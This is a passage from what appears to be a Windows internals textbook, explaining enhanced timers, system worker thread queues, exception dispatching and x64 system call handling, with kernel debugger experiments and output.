unlimited or no tolerance
Idle-resilient
NoWake, if it has
a tolerance
Ir, if it has a non-unlimited or
no tolerance
High-resolution &
Idle-resilient
Hr, always
Ir, if it has a non-unlimited or
no tolerance
Think of node 1 as the one that mirrors the default legacy timer behavior—
every clock tick, check if a timer is due to expire. Therefore, a timer is
guaranteed to expire as long as it’s in at least node 1, which implies that its
minimum due time is the same as its maximum due time. If it has unlimited
tolerance; however, it won’t be in node 1 because, technically, the timer
could never expire if the CPU remains sleeping forever.
High-resolution timers are the opposite; they are checked exactly at the
“right” time they’re supposed to expire and never earlier, so node 0 is used
for them. However, if their precise expiration time is “too early” for the
check in node 0, they might be in node 1 as well, at which point they are
treated like a regular (finite) timer (that is, they expire a little bit later than
expected). This can also happen if the caller provided a tolerance, the system
is idle, and there is an opportunity to coalesce the timer.
Similarly, an idle-resilient timer, if the system isn’t in the resiliency phase,
lives in the NoWake collection if it’s not also high resolution (the default
enhanced timer state) or lives in the Hr collection otherwise. However, on the
clock tick, which checks node 1, it must be in the special Ir collection to
recognize that the timer needs to execute even though the system is in deep
sleep.
Although it may seem confusing at first, this state combination allows all
legal combinations of timers to behave correctly when checked either at the
system clock tick (node 1—enforcing a maximum due time) or at the next
closest due time computation (node 0—enforcing a minimum due time).
As each timer is inserted into the appropriate collection
(KTIMER2_COLLECTION) and associated red-black tree node(s), the
collection’s next due time is updated to be the earliest due time of any timer
in the collection, whereas a global variable (KiNextTimer2Due) reflects the
earliest due time of any timer in any collection.
EXPERIMENT: Listing enhanced system timers
You also can use the same kernel debugger shown earlier to display
enhanced timers (Timer2’s), which are shown at the bottom of the
output:
Click here to view code image
KTIMER2s:
Address, Due time, Exp.
Type Callback, Attributes,
ffffa4840f6070b0 1825b8f1f4 [11/30/2020 20:50:16.089]
(Interrupt) [None] NWF (1826ea1ef4
[11/30/2020 20:50:18.089])
ffffa483ff903e48 1825c45674 [11/30/2020 20:50:16.164]
(Interrupt) [None] NW P (27ef6380)
ffffa483fd824960 1825dd19e8 [11/30/2020 20:50:16.326]
(Interrupt) [None] NWF (1828d80a68
[11/30/2020 20:50:21.326])
ffffa48410c07eb8 1825e2d9c6 [11/30/2020 20:50:16.364]
(Interrupt) [None] NW P (27ef6380)
ffffa483f75bde38 1825e6f8c4 [11/30/2020 20:50:16.391]
(Interrupt) [None] NW P (27ef6380)
ffffa48407108e60 1825ec5ae8 [11/30/2020 20:50:16.426]
(Interrupt) [None] NWF (1828e74b68
[11/30/2020 20:50:21.426])
ffffa483f7a194a0 1825fe1d10 [11/30/2020 20:50:16.543]
(Interrupt) [None] NWF (18272f4a10
[11/30/2020 20:50:18.543])
ffffa483fd29a8f8 18261691e3 [11/30/2020 20:50:16.703]
(Interrupt) [None] NW P (11e1a300)
ffffa483ffcc2660 18261707d3 [11/30/2020 20:50:16.706]
(Interrupt) [None] NWF (18265bd903
[11/30/2020 20:50:17.157])
ffffa483f7a19e30 182619f439 [11/30/2020 20:50:16.725]
(Interrupt) [None] NWF (182914e4b9
[11/30/2020 20:50:21.725])
ffffa483ff9cfe48 182745de01 [11/30/2020 20:50:18.691]
(Interrupt) [None] NW P (11e1a300)
ffffa483f3cfe740 18276567a9 [11/30/2020 20:50:18.897]
(Interrupt)
Wdf01000!FxTimer::_FxTimerExtCallbackThunk
(Context @ ffffa483f3db7360) NWF
(1827fdfe29
[11/30/2020 20:50:19.897]) P (02faf080)
ffffa48404c02938 18276c5890 [11/30/2020 20:50:18.943]
(Interrupt) [None] NW P (27ef6380)
ffffa483fde8e300 1827a0f6b5 [11/30/2020 20:50:19.288]
(Interrupt) [None] NWF (183091c835
[11/30/2020 20:50:34.288])
ffffa483fde88580 1827d4fcb5 [11/30/2020 20:50:19.628]
(Interrupt) [None] NWF (18290629b5
[11/30/2020 20:50:21.628])
In this example, you can mostly see No-wake (NW) enhanced
timers, with their minimum due time shown. Some are periodic (P)
and will keep being reinserted at expiration time. A few also have a
maximum due time, meaning that they have a tolerance specified,
showing you the latest time at which they might expire. Finally,
one enhanced timer has a callback associated with it, owned by the
Windows Driver Foundation (WDF) framework (see Chapter 6 of
Part 1 for more information on WDF drivers).
System worker threads
During system initialization, Windows creates several threads in the System
process, called system worker threads, which exist solely to perform work on
behalf of other threads. In many cases, threads executing at DPC/dispatch
level need to execute functions that can be performed only at a lower IRQL.
For example, a DPC routine, which executes in an arbitrary thread context
(because DPC execution can usurp any thread in the system) at DPC/dispatch
level IRQL, might need to access paged pool or wait for a dispatcher object
used to synchronize execution with an application thread. Because a DPC
routine can’t lower the IRQL, it must pass such processing to a thread that
executes at an IRQL below DPC/dispatch level.
Some device drivers and executive components create their own threads
dedicated to processing work at passive level; however, most use system
worker threads instead, which avoids the unnecessary scheduling and
memory overhead associated with having additional threads in the system.
An executive component requests a system worker thread’s services by
calling the executive functions ExQueueWorkItem or IoQueueWorkItem.
Device drivers should use only the latter (because this associates the work
item with a Device object, allowing for greater accountability and the
handling of scenarios in which a driver unloads while its work item is active).
These functions place a work item on a queue dispatcher object where the
threads look for work. (Queue dispatcher objects are described in more detail
in the section “I/O completion ports” in Chapter 6 in Part 1.)
The IoQueueWorkItemEx, IoSizeofWorkItem, IoInitializeWorkItem, and
IoUninitializeWorkItem APIs act similarly, but they create an association
with a driver’s Driver object or one of its Device objects.
Work items include a pointer to a routine and a parameter that the thread
passes to the routine when it processes the work item. The device driver or
executive component that requires passive-level execution implements the
routine. For example, a DPC routine that must wait for a dispatcher object
can initialize a work item that points to the routine in the driver that waits for
the dispatcher object. At some stage, a system worker thread will remove the
work item from its queue and execute the driver’s routine. When the driver’s
routine finishes, the system worker thread checks to see whether there are
more work items to process. If there aren’t any more, the system worker
thread blocks until a work item is placed on the queue. The DPC routine
might or might not have finished executing when the system worker thread
processes its work item.
There are many types of system worker threads:
■ Normal worker threads execute at priority 8 but otherwise behave like
delayed worker threads.
■ Background worker threads execute at priority 7 and inherit the same
behaviors as normal worker threads.
■ Delayed worker threads execute at priority 12 and process work items
that aren’t considered time-critical.
■ Critical worker threads execute at priority 13 and are meant to
process time-critical work items.
■ Super-critical worker threads execute at priority 14, otherwise
mirroring their critical counterparts.
■ Hyper-critical worker threads execute at priority 15 and are otherwise
just like other critical threads.
■ Real-time worker threads execute at priority 18, which gives them the
distinction of operating in the real-time scheduling range (see Chapter
4 of Part 1 for more information), meaning they are not subject to
priority boosting nor regular time slicing.
Because the naming of all of these worker queues started becoming
confusing, recent versions of Windows introduced custom priority worker
threads, which are now recommended for all driver developers and allow the
driver to pass in their own priority level.
A special kernel function, ExpLegacyWorkerInitialization, which is called
early in the boot process, appears to set an initial number of delayed and
critical worker queue threads, configurable through optional registry
parameters. You may even have seen these details in an earlier edition of this
book. Note, however, that these variables are there only for compatibility
with external instrumentation tools and are not actually utilized by any part
of the kernel on modern Windows 10 systems and later. This is because
recent kernels implemented a new kernel dispatcher object, the priority
queue (KPRIQUEUE), coupled it with a fully dynamic number of kernel
worker threads, and further split what used to be a single queue of worker
threads into per-NUMA node worker threads.
On Windows 10 and later, the kernel dynamically creates additional
worker threads as needed, with a default maximum limit of 4096 (see
ExpMaximumKernelWorkerThreads) that can be configured through the
registry up to a maximum of 16,384 threads and down to a minimum of 32.
You can set this using the MaximumKernelWorkerThreads value under the
registry key HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Executive.
Each partition object, which we described in Chapter 5 of Part 1, contains
an executive partition, which is the portion of the partition object relevant to
the executive—namely, the system worker thread logic. It contains a data
structure tracking the work queue manager for each NUMA node part of the
partition (a queue manager is made up of the deadlock detection timer, the
work queue item reaper, and a handle to the actual thread doing the
management). It then contains an array of pointers to each of the eight
possible work queues (EX_WORK_QUEUE). These queues are associated
with an individual index and track the number of minimum (guaranteed) and
maximum threads, as well as how many work items have been processed so
far.
Every system includes two default work queues: the ExPool queue and the
IoPool queue. The former is used by drivers and system components using
the ExQueueWorkItem API, whereas the latter is meant for
IoAllocateWorkItem-type APIs. Finally, up to six more queues are defined
for internal system use, meant to be used by the internal (non-exported)
ExQueueWorkItemToPrivatePool API, which takes in a pool identifier from
0 to 5 (making up queue indices 2 to 7). Currently, only the memory
manager’s Store Manager (see Chapter 5 of Part 1 for more information)
leverages this capability.
The executive tries to match the number of critical worker threads with
changing workloads as the system executes. Whenever work items are being
processed or queued, a check is made to see if a new worker thread might be
needed. If so, an event is signaled, waking up the
ExpWorkQueueManagerThread for the associated NUMA node and
partition. An additional worker thread is created in one of the following
conditions:
■ There are fewer threads than the minimum number of threads for this
queue.
■ The maximum thread count hasn’t yet been reached, all worker
threads are busy, and there are pending work items in the queue, or
the last attempt to try to queue a work item failed.
Additionally, once every second, for each worker queue manager (that is,
for each NUMA node on each partition) the ExpWorkQueueManagerThread
can also try to determine whether a deadlock may have occurred. This is
defined as an increase in work items queued during the last interval without a
matching increase in the number of work items processed. If this is
occurring, an additional worker thread will be created, regardless of any
maximum thread limits, hoping to clear out the potential deadlock. This
detection will then be disabled until it is deemed necessary to check again
(such as if the maximum number of threads has been reached). Since
processor topologies can change due to hot add dynamic processors, the
thread is also responsible for updating any affinities and data structures to
keep track of the new processors as well.
Finally, once every double the worker thread timeout minutes (by default
10, so once every 20 minutes), this thread also checks if it should destroy any
system worker threads. Through the same registry key, this can be configured
to be between 2 and 120 minutes instead, using the value
WorkerThreadTimeoutInSeconds. This is called reaping and ensures that
system worker thread counts do not get out of control. A system worker
thread is reaped if it has been waiting for a long time (defined as the worker
thread timeout value) and no further work items are waiting to be processed
(meaning the current number of threads are clearing them all out in a timely
fashion).
EXPERIMENT: Listing system worker threads
Unfortunately, due to the per-partition reshuffling of the system
worker thread functionality (which is no longer per-NUMA node as
before, and certainly no longer global), the kernel debugger’s
!exqueue command can no longer be used to see a listing of system
worker threads classified by their type and will error out.
Since the EPARTITION, EX_PARTITION, and
EX_WORK_QUEUE data structures are all available in the public
symbols, the debugger data model can be used to explore the
queues and their manager. For example, here is how you can look
at the NUMA Node 0 worker thread manager for the main (default)
system partition:
Click here to view code image
lkd> dx ((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0] : 0xffffa483edea99d0 [Type:
_EX_WORK_QUEUE_MANAGER *]
[+0x000] Partition : 0xffffa483ede51090 [Type:
_EX_PARTITION *]
[+0x008] Node : 0xfffff80467f24440 [Type:
_ENODE *]
[+0x010] Event [Type: _KEVENT]
[+0x028] DeadlockTimer [Type: _KTIMER]
[+0x068] ReaperEvent [Type: _KEVENT]
[+0x080] ReaperTimer [Type: _KTIMER2]
[+0x108] ThreadHandle : 0xffffffff80000008 [Type:
void *]
[+0x110] ExitThread : 0x0 [Type: unsigned long]
[+0x114] ThreadSeed : 0x1 [Type: unsigned short]
Alternatively, here is the ExPool for NUMA Node 0, which
currently has 15 threads and has processed almost 4 million work
items so far!
Click here to view code image
lkd> dx ((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d : 0xffffa483ede4dc70 [Type:
_EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition : 0xffffa483ede51090 [Type:
_EX_PARTITION *]
[+0x2b8] Node : 0xfffff80467f24440 [Type:
_ENODE *]
[+0x2c0] WorkItemsProcessed : 3942949 [Type: unsigned
long]
[+0x2c4] WorkItemsProcessedLastPass : 3931167 [Type:
unsigned long]
[+0x2c8] ThreadCount : 15 [Type: long]
[+0x2cc (30: 0)] MinThreads : 0 [Type: long]
[+0x2cc (31:31)] TryFailed : 0 [Type: unsigned
long]
[+0x2d0] MaxThreads : 4096 [Type: long]
[+0x2d4] QueueIndex : ExPoolUntrusted (0) [Type:
_EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
You could then look into the ThreadList field of the
WorkPriQueue to enumerate the worker threads associated with
this queue:
Click here to view code image
lkd> dx -r0 @$queue = ((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->
ExPartition)->WorkQueues[0][0]
@$queue = ((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0] : 0xffffa483ede4dc70
[Type: _EX_WORK_QUEUE *]
lkd> dx Debugger.Utility.Collections.FromListEntry(@$queue-
>WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
Debugger.Utility.Collections.FromListEntry(@$queue-
>WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
[0x0] [Type: _KTHREAD]
[0x1] [Type: _KTHREAD]
[0x2] [Type: _KTHREAD]
[0x3] [Type: _KTHREAD]
[0x4] [Type: _KTHREAD]
[0x5] [Type: _KTHREAD]
[0x6] [Type: _KTHREAD]
[0x7] [Type: _KTHREAD]
[0x8] [Type: _KTHREAD]
[0x9] [Type: _KTHREAD]
[0xa] [Type: _KTHREAD]
[0xb] [Type: _KTHREAD]
[0xc] [Type: _KTHREAD]
[0xd] [Type: _KTHREAD]
[0xe] [Type: _KTHREAD]
[0xf] [Type: _KTHREAD]
That was only the ExPool. Recall that the system also has an
IoPool, which would be the next index (1) on this NUMA Node
(0). You can also continue the experiment by looking at private
pools, such as the Store Manager’s pool.
Click here to view code image
lkd> dx ((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
((nt!_EX_PARTITION*)(*
(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d : 0xffffa483ede77c50 [Type:
_EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition : 0xffffa483ede51090 [Type:
_EX_PARTITION *]
[+0x2b8] Node : 0xfffff80467f24440 [Type:
_ENODE *]
[+0x2c0] WorkItemsProcessed : 1844267 [Type: unsigned
long]
[+0x2c4] WorkItemsProcessedLastPass : 1843485 [Type:
unsigned long]
[+0x2c8] ThreadCount : 5 [Type: long]
[+0x2cc (30: 0)] MinThreads : 0 [Type: long]
[+0x2cc (31:31)] TryFailed : 0 [Type: unsigned
long]
[+0x2d0] MaxThreads : 4096 [Type: long]
[+0x2d4] QueueIndex : IoPoolUntrusted (1) [Type:
_EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
Exception dispatching
In contrast to interrupts, which can occur at any time, exceptions are
conditions that result directly from the execution of the program that is
running. Windows uses a facility known as structured exception handling,
which allows applications to gain control when exceptions occur. The
application can then fix the condition and return to the place the exception
occurred, unwind the stack (thus terminating execution of the subroutine that
raised the exception), or declare back to the system that the exception isn’t
recognized, and the system should continue searching for an exception
handler that might process the exception. This section assumes you’re
familiar with the basic concepts behind Windows structured exception
handling—if you’re not, you should read the overview in the Windows API
reference documentation in the Windows SDK or Chapters 23 through 25 in
Jeffrey Richter and Christophe Nasarre’s book Windows via C/C++
(Microsoft Press, 2007) before proceeding. Keep in mind that although
exception handling is made accessible through language extensions (for
example, the __try construct in Microsoft Visual C++), it is a system
mechanism and hence isn’t language specific.
On the x86 and x64 processors, all exceptions have predefined interrupt
numbers that directly correspond to the entry in the IDT that points to the
trap handler for a particular exception. Table 8-12 shows x86-defined
exceptions and their assigned interrupt numbers. Because the first entries of
the IDT are used for exceptions, hardware interrupts are assigned entries later
in the table, as mentioned earlier.
Table 8-12 x86 exceptions and their interrupt numbers
Interrupt
Number
Exception
Mnemon
ic
0
Divide Error
#DE
1
Debug (Single Step)
#DB
2
Non-Maskable Interrupt
(NMI)
-
3
Breakpoint
#BP
4
Overflow
#OF
5
Bounds Check (Range
#BR
Exceeded)
6
Invalid Opcode
#UD
7
NPX Not Available
#NM
8
Double Fault
#DF
9
NPX Segment Overrun
-
10
Invalid Task State
Segment (TSS)
#TS
11
Segment Not Present
#NP
12
Stack-Segment Fault
#SS
13
General Protection
#GP
14
Page Fault
#PF
15
Intel Reserved
-
16
x87 Floating Point
#MF
17
Alignment Check
#AC
18
Machine Check
#MC
19
SIMD Floating Point
#XM or
#XF
20
Virtualization Exception
#VE
21
Control Protection (CET)
#CP
All exceptions, except those simple enough to be resolved by the trap
handler, are serviced by a kernel module called the exception dispatcher. The
exception dispatcher’s job is to find an exception handler that can dispose of
the exception. Examples of architecture-independent exceptions that the
kernel defines include memory-access violations, integer divide-by-zero,
integer overflow, floating-point exceptions, and debugger breakpoints. For a
complete list of architecture-independent exceptions, consult the Windows
SDK reference documentation.
The kernel traps and handles some of these exceptions transparently to
user programs. For example, encountering a breakpoint while executing a
program being debugged generates an exception, which the kernel handles by
calling the debugger. The kernel handles certain other exceptions by
returning an unsuccessful status code to the caller.
A few exceptions are allowed to filter back, untouched, to user mode. For
example, certain types of memory-access violations or an arithmetic
overflow generate an exception that the operating system doesn’t handle. 32-
bit applications can establish frame-based exception handlers to deal with
these exceptions. The term frame-based refers to an exception handler’s
association with a particular procedure activation. When a procedure is
invoked, a stack frame representing that activation of the procedure is pushed
onto the stack. A stack frame can have one or more exception handlers
associated with it, each of which protects a particular block of code in the
source program. When an exception occurs, the kernel searches for an
exception handler associated with the current stack frame. If none exists, the
kernel searches for an exception handler associated with the previous stack
frame, and so on, until it finds a frame-based exception handler. If no
exception handler is found, the kernel calls its own default exception
handlers.
For 64-bit applications, structured exception handling does not use frame-
based handlers (the frame-based technology has been proven to be attackable
by malicious users). Instead, a table of handlers for each function is built into
the image during compilation. The kernel looks for handlers associated with
each function and generally follows the same algorithm we described for 32-
bit code.
Structured exception handling is heavily used within the kernel itself so
that it can safely verify whether pointers from user mode can be safely
accessed for read or write access. Drivers can make use of this same
technique when dealing with pointers sent during I/O control codes
(IOCTLs).
Another mechanism of exception handling is called vectored exception
handling. This method can be used only by user-mode applications. You can
find more information about it in the Windows SDK or Microsoft Docs at
https://docs.microsoft.com/en-us/windows/win32/debug/vectored-exception-
handling.
When an exception occurs, whether it is explicitly raised by software or
implicitly raised by hardware, a chain of events begins in the kernel. The
CPU hardware transfers control to the kernel trap handler, which creates a
trap frame (as it does when an interrupt occurs). The trap frame allows the
system to resume where it left off if the exception is resolved. The trap
handler also creates an exception record that contains the reason for the
exception and other pertinent information.
If the exception occurred in kernel mode, the exception dispatcher simply
calls a routine to locate a frame-based exception handler that will handle the
exception. Because unhandled kernel-mode exceptions are considered fatal
operating system errors, you can assume that the dispatcher always finds an
exception handler. Some traps, however, do not lead into an exception
handler because the kernel always assumes such errors to be fatal; these are
errors that could have been caused only by severe bugs in the internal kernel
code or by major inconsistencies in driver code (that could have occurred
only through deliberate, low-level system modifications that drivers should
not be responsible for). Such fatal errors will result in a bug check with the
UNEXPECTED_KERNEL_MODE_TRAP code.
If the exception occurred in user mode, the exception dispatcher does
something more elaborate. The Windows subsystem has a debugger port (this
is actually a debugger object, which will be discussed later) and an exception
port to receive notification of user-mode exceptions in Windows processes.
(In this case, by “port” we mean an ALPC port object, which will be
discussed later in this chapter.) The kernel uses these ports in its default
exception handling, as illustrated in Figure 8-24.
Figure 8-24 Dispatching an exception.
Debugger breakpoints are common sources of exceptions. Therefore, the
first action the exception dispatcher takes is to see whether the process that
incurred the exception has an associated debugger process. If it does, the
exception dispatcher sends a debugger object message to the debug object
associated with the process (which internally the system refers to as a “port”
for compatibility with programs that might rely on behavior in Windows
2000, which used an LPC port instead of a debug object).
If the process has no debugger process attached or if the debugger doesn’t
handle the exception, the exception dispatcher switches into user mode,
copies the trap frame to the user stack formatted as a CONTEXT data
structure (documented in the Windows SDK), and calls a routine to find a
structured or vectored exception handler. If none is found or if none handles
the exception, the exception dispatcher switches back into kernel mode and
calls the debugger again to allow the user to do more debugging. (This is
called the second-chance notification.)
If the debugger isn’t running and no user-mode exception handlers are
found, the kernel sends a message to the exception port associated with the
thread’s process. This exception port, if one exists, was registered by the
environment subsystem that controls this thread. The exception port gives the
environment subsystem, which presumably is listening at the port, the
opportunity to translate the exception into an environment-specific signal or
exception. However, if the kernel progresses this far in processing the
exception and the subsystem doesn’t handle the exception, the kernel sends a
message to a systemwide error port that Csrss (Client/Server Run-Time
Subsystem) uses for Windows Error Reporting (WER)—which is discussed
in Chapter 10—and executes a default exception handler that simply
terminates the process whose thread caused the exception.
Unhandled exceptions
All Windows threads have an exception handler that processes unhandled
exceptions. This exception handler is declared in the internal Windows start-
of-thread function. The start-of-thread function runs when a user creates a
process or any additional threads. It calls the environment-supplied thread
start routine specified in the initial thread context structure, which in turn
calls the user-supplied thread start routine specified in the CreateThread call.
The generic code for the internal start-of-thread functions is shown here:
Click here to view code image
VOID RtlUserThreadStart(VOID)
{
LPVOID StartAddress = RCX; // Located in the initial thread
context structure
LPVOID Argument = RDX; // Located in the initial thread context
structure
LPVOID Win32StartAddr;
if (Kernel32ThreadInitThunkFunction != NULL) {
Win32StartAddr = Kernel32ThreadInitThunkFunction;
} else {
Win32StartAddr = StartAddress;
}
__try
{
DWORD ThreadExitCode = Win32StartAddr(Argument);
RtlExitUserThread(ThreadExitCode);
}
__except(RtlpGetExceptionFilter(GetExceptionInformation()))
{
NtTerminateProcess(NtCurrentProcess(), GetExceptionCode());
}
}
Notice that the Windows unhandled exception filter is called if the thread
has an exception that it doesn’t handle. The purpose of this function is to
provide the system-defined behavior for what to do when an exception is not
handled, which is to launch the WerFault.exe process. However, in a default
configuration, the Windows Error Reporting service, described in Chapter
10, will handle the exception and this unhandled exception filter never
executes.
EXPERIMENT: Viewing the real user start address
for Windows threads
The fact that each Windows thread begins execution in a system-
supplied function (and not the user-supplied function) explains why
the start address for thread 0 is the same for every Windows
process in the system (and why the start addresses for secondary
threads are also the same). To see the user-supplied function
address, use Process Explorer or the kernel debugger.
Because most threads in Windows processes start at one of the
system-supplied wrapper functions, Process Explorer, when
displaying the start address of threads in a process, skips the initial
call frame that represents the wrapper function and instead shows
the second frame on the stack. For example, notice the thread start
address of a process running Notepad.exe:
Process Explorer does display the complete call hierarchy when
it displays the call stack. Notice the following results when the
Stack button is clicked:
Line 20 in the preceding screen shot is the first frame on the
stack—the start of the internal thread wrapper. The second frame
(line 19) is the environment subsystem’s thread wrapper—in this
case, kernel32, because you are dealing with a Windows subsystem
application. The third frame (line 18) is the main entry point into
Notepad.exe.
To show the correct function names, you should configure
Process Explorer with the proper symbols. First you need to install
the Debugging Tools, which are available in the Windows SDK or
WDK. Then you should select the Configure Symbols menu item
located in the Options menu. The dbghelp.dll path should point to
the file located in the debugging tools folder (usually C:\Program
Files\Windows Kits\10\Debuggers; note that the dbghelp.dll file
located in C:\Windows\System32 would not work), and the
Symbols path should be properly configured to download the
symbols from the Microsoft symbols store in a local folder, as in
the following figure:
System service handling
As Figure 8-24 illustrated, the kernel’s trap handlers dispatch interrupts,
exceptions, and system service calls. In the preceding sections, you saw how
interrupt and exception handling work; in this section, you’ll learn about
system services. A system service dispatch (shown in Figure 8-25) is
triggered as a result of executing an instruction assigned to system service
dispatching. The instruction that Windows uses for system service
dispatching depends on the processor on which it is executing and whether
Hypervisor Code Integrity (HVCI) is enabled, as you’re about to learn.
Figure 8-25 System service dispatching.
Architectural system service dispatching
On most x64 systems, Windows uses the syscall instruction, which results in
the change of some of the key processor state we have learned about in this
chapter, based on certain preprogrammed model specific registers (MSRs):
■ 0xC0000081, known as STAR (SYSCALL Target Address Register)
■ 0xC0000082, known as LSTAR (Long-Mode STAR)
■ 0xC0000084, known as SFMASK (SYSCALL Flags Mask)
Upon encountering the syscall instruction, the processor acts in the following
manner:
■ The Code Segment (CS) is loaded from Bits 32 to 47 in STAR, which
Windows sets to 0x0010 (KGDT64_R0_CODE).
■ The Stack Segment (SS) is loaded from Bits 32 to 47 in STAR plus 8,
which gives us 0x0018 (KGDT_R0_DATA).
■ The Instruction Pointer (RIP) is saved in RCX, and the new value is
loaded from LSTAR, which Windows sets to KiSystemCall64 if the
Meltdown (KVA Shadowing) mitigation is not needed, or
KiSystemCall64Shadow otherwise. (More information on the
Meltdown vulnerability was provided in the “Hardware side-channel
vulnerabilities” section earlier in this chapter.)
■ The current processor flags (RFLAGS) are saved in R11 and then
masked with SFMASK, which Windows sets to 0x4700 (Trap Flag,
Direction Flag, Interrupt Flag, and Nested Task Flag).
■ The Stack Pointer (RSP) and all other segments (DS, ES, FS, and GS)
are kept to their current user-space values.
Therefore, although the instruction executes in very few processor cycles, it
does leave the processor in an insecure and unstable state—the user-mode
stack pointer is still loaded, GS is still pointing to the TEB, but the Ring
Level, or CPL, is now 0, enabling kernel mode privileges. Windows acts
quickly to place the processor in a consistent operating environment. Outside
of the KVA shadow-specific operations that might happen on legacy
processors, these are the precise steps that KiSystemCall64 must perform:
By using the swapgs instruction, GS now points to the PCR, as described
earlier in this chapter.
The current stack pointer (RSP) is saved into the UserRsp field of the PCR.
Because GS has now correctly been loaded, this can be done without using
any stack or register.
The new stack pointer is loaded from the RspBase field of the PRCB (recall
that this structure is stored as part of the PCR).
Now that the kernel stack is loaded, the function builds a trap frame, using
the format described earlier in the chapter. This includes storing in the frame
the SegSs set to KGDT_R3_DATA (0x2B), Rsp from the UserRsp in the PCR,
EFlags from R11, SegCs set to KGDT_R3_CODE (0x33), and storing Rip
from RCX. Normally, a processor trap would’ve set these fields, but
Windows must emulate the behavior based on how syscall operates.
Loading RCX from R10. Normally, the x64 ABI dictates that the first
argument of any function (including a syscall) be placed in RCX—yet the
syscall instruction overrides RCX with the instruction pointer of the caller, as
shown earlier. Windows is aware of this behavior and copies RCX into R10
before issuing the syscall instruction, as you’ll soon see, so this step restores
the value.
The next steps have to do with processor mitigations such as Supervisor
Mode Access Prevention (SMAP)—such as issuing the stac instruction—and
the myriad processor side-channel mitigations, such as clearing the branch
tracing buffers (BTB) or return store buffer (RSB). Additionally, on
processors with Control-flow Enforcement Technology (CET), the shadow
stack for the thread must also be synchronized correctly. Beyond this point,
additional elements of the trap frame are stored, such as various nonvolatile
registers and debug registers, and the nonarchitectural handling of the system
call begins, which we discuss in more detail in just a bit.
Not all processors are x64, however, and it’s worth pointing out that on x86
processors, for example, a different instruction is used, which is called
sysenter. As 32-bit processors are increasingly rare, we don’t spend too much
time digging into this instruction other than mentioning that its behavior is
similar—a certain amount of processor state is loaded from various MSRs,
and the kernel does some additional work, such as setting up the trap frame.
More details can be found in the relevant Intel processor manuals. Similarly,
ARM-based processors use the svc instruction, which has its own behavior
and OS-level handling, but these systems still represent only a small minority
of Windows installations.
There is one more corner case that Windows must handle: processors
without Mode Base Execution Controls (MBEC) operating while Hypervisor
Code Integrity (HVCI) is enabled suffer from a design issue that violates the
promises HVCI provides. (Chapter 9 covers HVCI and MBEC.) Namely, an
attacker could allocate user-space executable memory, which HVCI allows
(by marking the respective SLAT entry as executable), and then corrupt the
PTE (which is not protected against kernel modification) to make the virtual
address appear as a kernel page. Because the MMU would see the page as
being kernel, Supervisor Mode Execution Prevention (SMEP) would not
prohibit execution of the code, and because it was originally allocated as a
user physical page, the SLAT entry wouldn’t prohibit the execution either.
The attacker has now achieved arbitrary kernel-mode code execution,
violating the basic tenet of HVCI.
MBEC and its sister technologies (Restricted User Mode) fix this issue by
introducing distinct kernel versus user executable bits in the SLAT entry data
structures, allowing the hypervisor (or the Secure Kernel, through VTL1-
specific hypercalls) to mark user pages as kernel non executable but user
executable. Unfortunately, on processors without this capability, the
hypervisor has no choice but to trap all code privilege level changes and
swap between two different sets of SLAT entries—ones marking all user
physical pages as nonexecutable, and ones marking them as executable. The
hypervisor traps CPL changes by making the IDT appear empty (effectively
setting its limit to 0) and decoding the underlying instruction, which is an
expensive operation. However, as interrupts can directly be trapped by the
hypervisor, avoiding these costs, the system call dispatch code in user space
prefers issuing an interrupt if it detects an HVCI-enabled system without
MBEC-like capabilities. The SystemCall bit in the Shared User Data
structure described in Chapter 4, Part 1, is what determines this situation.
Therefore, when SystemCall is set to 1, x64 Windows uses the int 0x2e
instruction, which results in a trap, including a fully built-out trap frame that
does not require OS involvement. Interestingly, this happens to be the same
instruction that was used on ancient x86 processors prior to the Pentium Pro,
and continues to still be supported on x86 systems for backward
compatibility with three-decade-old software that had unfortunately
hardcoded this behavior. On x64, however, int 0x2e can be used only in this
scenario because the kernel will not fill out the relevant IDT entry otherwise.
Regardless of which instruction is ultimately used, the user-mode system call
dispatching code always stores a system call index in a register—EAX on x86
and x64, R12 on 32-bit ARM, and X8 on ARM64—which will be further
inspected by the nonarchitectural system call handling code we’ll see next.
And, to make things easy, the standard function call processor ABI
(application binary interface) is maintained across the boundary—for
example, arguments are placed on the stack on x86, and RCX (technically
R10 due to the behavior of syscall), RDX, R8, R9 plus the stack for any
arguments past the first four on x64.
Once dispatching completes, how does the processor return to its old state?
For trap-based system calls that occurred through int 0x2e, the iret instruction
restores the processor state based on the hardware trap frame on the stack.
For syscall and sysenter, though, the processor once again leverages the
MSRs and hardcoded registers we saw on entry, through specialized
instructions called sysret and sysexit, respectively. Here’s how the former
behaves:
■ The Stack Segment (SS) is loaded from bits 48 to 63 in STAR, which
Windows sets to 0x0023 (KGDT_R3_DATA).
■ The Code Segment (CS) is loaded from bits 48 to 63 in STAR plus
0x10, which gives us 0x0033 (KGDT64_R3_CODE).
■ The Instruction Pointer (RIP) is loaded from RCX.
■ The processor flags (RFLAGS) are loaded from R11.
■ The Stack Pointer (RSP) and all other segments (DS, ES, FS, and GS)
are kept to their current kernel-space values.
Therefore, just like for system call entry, the exit mechanics must also clean
